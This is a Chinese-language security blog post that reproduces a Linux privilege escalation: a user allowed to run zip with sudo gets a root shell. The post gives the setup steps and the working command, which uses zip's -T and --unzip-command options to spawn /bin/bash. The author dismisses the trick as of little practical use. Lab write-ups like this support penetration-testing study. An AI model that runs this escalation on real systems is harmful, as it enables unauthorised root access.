使用ZIP进行提权

Last updated on 2 years ago

今天看到一则推文:在linux中使用zip可以低权限用户提升为高权限。

当使用高权限运行时,zip的执行会发生变化。假设系统管理员已向普通用户授予sudo权限以运行zip,可导致低权限用户提升为高权限。

利用前提

  • 安装有zip(一般情况都装有)
  • 允许本地用户已sudo权限运行zip

复现

创建一个普通用户 test,并设置允许以sudo权限运行zip。

1
2
3
useradd -m test
passwd test
vi /etc/sudoers

ssh登录test

touch一个txt文件(任意),然后使用-T选项并用--unzip-command(调用命令),进行文件压缩。

1
2
touch fu.txt
sudo zip r.zip fu.txt -T --unzip-command="bash -c /bin/bash"

END

这个好鸡肋。。。

这其实还是"使用" sudo 方式进行提权的,现在基本没有管理员会把普通用户加入到sudoers文件中了吧。

Reference

https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation/

漏洞复现
#Linux #ZIP Privilege Escalation
使用ZIP进行提权
https://guosec.online/posts/c80808d5.html
Posted on
June 8, 2019
Updated on
July 2, 2022
Licensed under
本博客所有文章除特别声明外,均采用  协议,转载请注明出处!